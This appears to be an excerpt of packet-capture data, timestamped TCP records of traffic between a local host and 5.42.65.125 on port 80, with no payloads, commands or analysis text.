Dec 27, 2023 17:57:26.098542929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.098551035 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.098557949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.098572969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.098584890 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.098587036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.098603964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.098608971 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.098618984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.098634005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.098658085 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.098660946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.098681927 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.098690987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.098717928 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.098737001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.098840952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.098855019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.098870039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.098886013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.098896980 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.098903894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.098926067 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.098938942 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.099337101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.099385977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.099440098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.099455118 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.099468946 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.099469900 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.099482059 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.099500895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.099503040 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.099514961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.099529028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.099529982 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.099545956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.099562883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.099574089 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.099575043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.099592924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.099600077 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.099622011 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.099637032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.099651098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.099663019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.099675894 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.099682093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.099695921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.099709988 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.099711895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.099728107 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.100780010 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.100795984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.100867987 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.100965023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.100981951 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.100999117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.101011038 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.101012945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.101028919 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.101037025 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.101043940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.101058006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.101073027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.101083994 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.101089001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.101103067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.101119041 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.101119041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.101128101 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.101135015 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.101150036 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.101162910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.101169109 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.101180077 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.101191044 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.101195097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.101213932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.101217031 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.101231098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.101246119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.101262093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.101272106 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.101277113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.101291895 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.101294994 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.101305962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.101320982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.101322889 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.101341009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.101355076 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.101356030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.101378918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.101387978 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.101396084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.101411104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.101421118 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.101805925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.101855993 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.102051020 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.102067947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.102080107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.102092981 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.102092981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.102109909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.102124929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.102124929 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.102139950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.102150917 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.102154970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.102173090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.102185965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.102194071 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.102200031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.102210999 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.102216959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.102231026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.102240086 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.102245092 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.102258921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.102272034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.102284908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.102286100 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.102299929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.102313042 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.102850914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.102869034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.102881908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.102896929 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.102930069 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.102936983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.102952003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.102965117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.102984905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.102998018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.103003979 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.103024960 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.103077888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.103092909 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.103105068 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.103120089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.103130102 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.103152990 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.103322983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.103338003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.103404045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.103420019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.103477955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.103492022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.103545904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.103569984 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.103589058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.103600025 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.103609085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.103647947 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.103652000 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.103662968 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.103677988 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.103704929 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.103713989 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.103724957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.103755951 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.103780031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.103796005 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.103832006 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.104084969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.104190111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.104206085 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.104253054 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.104316950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.104434967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.104449987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.104465008 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.104480982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.104495049 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.104500055 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.104511023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.104527950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.104537964 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.104542971 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.104557037 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.104571104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.104581118 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.104655981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.104670048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.104684114 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.104724884 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.104753017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.104767084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.104784012 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.104798079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.104813099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.104818106 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.104862928 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.105207920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.105249882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.105258942 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.105268002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.105283022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.105320930 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.105333090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.105349064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.105364084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.105377913 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.105402946 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.105427980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.105602026 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.105616093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.105629921 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.105647087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.105649948 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.105675936 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.105827093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.105843067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.105874062 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.105899096 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.105914116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.105927944 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.105937958 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.105943918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.105961084 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.105978966 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.105993986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.105993986 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.106009007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.106026888 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.106040955 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.106093884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.106107950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.106121063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.106131077 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.106134892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.106149912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.106162071 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.106190920 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.106283903 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.106298923 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.106312990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.106328964 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.106338024 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.106363058 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.106723070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.106810093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.106858969 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.106882095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.106897116 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.106909990 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.106924057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.106942892 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.106951952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.106966019 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.106967926 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.106978893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.106993914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.107007027 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.107012987 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.107023001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.107029915 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.107059956 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.107176065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.107191086 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.107204914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.107218981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.107234001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.107237101 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.107249022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.107264042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.107270002 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.107285023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.107297897 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.107326984 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.107703924 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.107862949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.107877016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.107891083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.107906103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.107908964 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.107919931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.107933044 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.107933998 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.107947111 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.107959032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.107966900 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.107975006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.107989073 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.108001947 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.108021021 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.108211994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.108251095 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.108259916 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.108267069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.108283043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.108298063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.108321905 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.108326912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.108345985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.108350039 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.108375072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.108385086 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.108469009 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.108485937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.108499050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.108515024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.108522892 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.108530045 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.108545065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.108553886 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.108577967 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.108584881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.108599901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.108613014 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.108628035 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.108639956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.108647108 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.108654976 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.108656883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.108695030 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.109199047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.109214067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.109236956 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.109267950 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.109282970 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.109306097 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.109405994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.109450102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.109467983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.109471083 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.109483004 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.109498978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.109502077 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.109513998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.109529018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.109535933 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.109546900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.109561920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.109575033 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.109587908 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 17:57:26.109587908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 17:57:26.109605074 CET	80	49738	5.42.65.125	192.168.2.4
